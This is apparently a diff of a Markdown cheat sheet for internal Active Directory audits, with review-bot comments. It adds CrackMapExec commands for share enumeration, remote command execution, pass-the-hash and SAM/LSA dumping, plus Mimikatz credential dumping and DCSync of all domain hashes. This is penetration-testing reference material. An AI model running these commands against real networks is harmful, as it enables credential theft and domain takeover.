@@ -4,12 +4,16 @@ categories: [cheatsheets]
tags: [windows, security, network, AD]
---
 
-# Internal Network Audit
+ Internal Network Audit
 
## Low Hanging Fruits
 
### AD User Details
 
+* Get domain password policy
+```
+net accounts /domain
+```
* use PowerView to list domain users with more information
- [https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView)
- Admin Account Flag
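Review bot: the H1 is demoted to a bare line with a leading space (`+ Internal Network Audit`), which renders as a stray paragraph under the front matter rather than a title. If the page title now comes from the front matter, drop the line entirely; otherwise keep `# Internal Network Audit`. The new `net accounts /domain` block is a good addition; worth a short note that it reports only the default domain policy, and fine-grained password policies (PSOs) applied to specific groups or users are not shown by it.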
@@ -18,7 +22,7 @@ tags: [windows, security, network, AD]
- pwdlastset
- description (sometimes used to store passwords)
 
-* Get accountname & descriptions
+* Get accountname & descriptions (can store interesting information)
```
Get-DomainUser | Select-Object -Properties samaccountname,description
```
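Review bot: the new parenthetical `(can store interesting information)` duplicates the sub-bullet `- description (sometimes used to store passwords)` a few lines above; keep the more specific one and drop the other. Separately, the context command `Get-DomainUser | Select-Object -Properties samaccountname,description` does not run as written, because `Select-Object` takes `-Property`, not `-Properties`. Either `Get-DomainUser -Properties samaccountname,description` (PowerView's own parameter) or `Get-DomainUser | Select-Object -Property samaccountname,description` works. Note also that the linked PowerTools PowerView exposes `Get-NetUser`; `Get-DomainUser` is the name in the PowerSploit dev-branch PowerView, so the link and the command should agree.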
@@ -86,7 +90,7 @@ SharpHound.exe -c SessionLoop --MaxLoopTime 24h
sh> responder.py -c config -I eth0
```
 
-* what triggers llmnr and NetBios broadcasts?
+* what triggers LLMNR, NetBios and WPAD broadcasts?
- If a domain cannot be resolved by DNS (wont work in new browsers)
- Set DNS entries as unprivileged users
- if IPv6 is not configured, it overrules IPv4 (Tool: MITM6)
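Review bot: WPAD is added to the question but none of the sub-bullets answers it. Document that Windows looks up `wpad` (DHCP option 252, then DNS, then LLMNR/NetBIOS name resolution) whenever automatic proxy detection is enabled, which is why it ends up in the same broadcast traffic; the corresponding fix is to disable auto-detect or to register a real `wpad` DNS entry so the lookup never falls through to broadcast. Spelling in the same bullet: `NetBios` should be `NetBIOS`, and `wont` should be `won't`; "new browsers" is vague, name which behaviour changed. The IPv6 sub-bullet is also imprecise: Windows prefers IPv6 over IPv4 when both are present, so an unmanaged IPv6 stack lets a rogue DHCPv6 server set the DNS server, which is the mitm6 scenario; "overrules IPv4" does not explain that it is DNS resolution that gets taken over.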
@@ -114,7 +118,8 @@ sh> responder.py -c config -I eth0
* Tool: CrackMapExec [https://github.com/byt3bl33d3r/CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec)
* Detailed Wiki Page:
- [https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference](https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference)
-
+* `-p <password>` can be replaced with `-H <hash>` for PtH Attacks
+* CME will print `(pwn3d)` once a user has write access to `C$` or `ADMIN$`
* Enumerating SMB shares and saving ips where SMB signing is disabled
```
sh> cme smb <cidr> --gen-relay-list targets.txt
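Review bot: the marker CME prints is `(Pwn3d!)`, not `(pwn3d)`; quote it exactly so readers can grep output for it. It means the credential has local administrator rights on that host (which is what grants write access to `ADMIN$`/`C$`), so "local admin" describes it better than the share permission. The `-H <hash>` bullet should say what it takes: the NT hash, either on its own or as `LM:NT`.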
@@ -125,6 +130,31 @@ SMB 192.168.1.111 445 SERVER1 [*] Windows Server 2016 Sta
SMB 192.168.1.117 445 WIN10DESK1 [*] WIN10DESK1 x64 (name:WIN10DESK1) (domain:OCEAN) (signing:False) (SMBv1:True)
```
 
+* Enumerating all shares
+```
+sh> cme smb ips.txt -u <user> -p <pass> --shares
+```
+
+* Code Execution (write access to `C$` or `ADMIN$` is needed)
+```
+sh> cme smb ips.txt -u <user> -p <pass> -[xX] 'whoami'
+```
+
+* Dumping Secrets (write access to `C$` or `ADMIN$` is needed)
+```
+sh> cme smb ips.txt -u <user> -p <pass> --[sam/lsa]
+```
+
+### Mimikatz
+
+* Dropping logonpasswords
+```
+mimikatz "privilege::debug" "sekurlsa::logonpasswords"
+```
+* DCSync (requires GenericAll permissions)
+```
+lsadump::dcsync /domain:<domain> /all /csv
+```
 
### Tipps: **GenericAll**
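Review bot: `-[xX]` and `--[sam/lsa]` read like bracket notation inside a command fence and will be pasted literally; spell out the real flags: `-x` runs a command through cmd and `-X` through PowerShell, and `--sam` (local SAM hashes) and `--lsa` (LSA secrets) are two separate switches. `DCSync (requires GenericAll permissions)` is inaccurate: DCSync needs the replication rights on the domain object (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All); GenericAll on the domain implies them, but Domain Admins and domain controllers hold them without GenericAll, so say "replication rights" and keep GenericAll as one way to obtain them. From the detection side it is worth a sentence that a `/all /csv` replication request from a non-DC host is a high-fidelity alert condition. Minor: `Dropping logonpasswords` should be `Dumping logonpasswords`, and the context heading `Tipps` should be `Tips`.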
 
@@ -135,11 +165,8 @@ SMB 192.168.1.117 445 WIN10DESK1 [*] WIN10DESK1 x64 (name:WI
- DC Sync + DC Shadow to reset old password
 
 
-
## More Advanced Attacks
 
-TODO
-
### Kerberoasting
 
### AS-REP Roast
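Review bot: removing `TODO` leaves `## More Advanced Attacks` with three empty subsections (`### Kerberoasting`, `### AS-REP Roast`, `### NTLM relaying attack`) and no marker that they are unfinished; either keep a placeholder under each heading or fill them in this change, otherwise the rendered page shows bare headings with nothing beneath them. The other lines in the hunk are whitespace-only removals and are fine.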
@@ -147,4 +174,3 @@ TODO
### NTLM relaying attack
 
 
-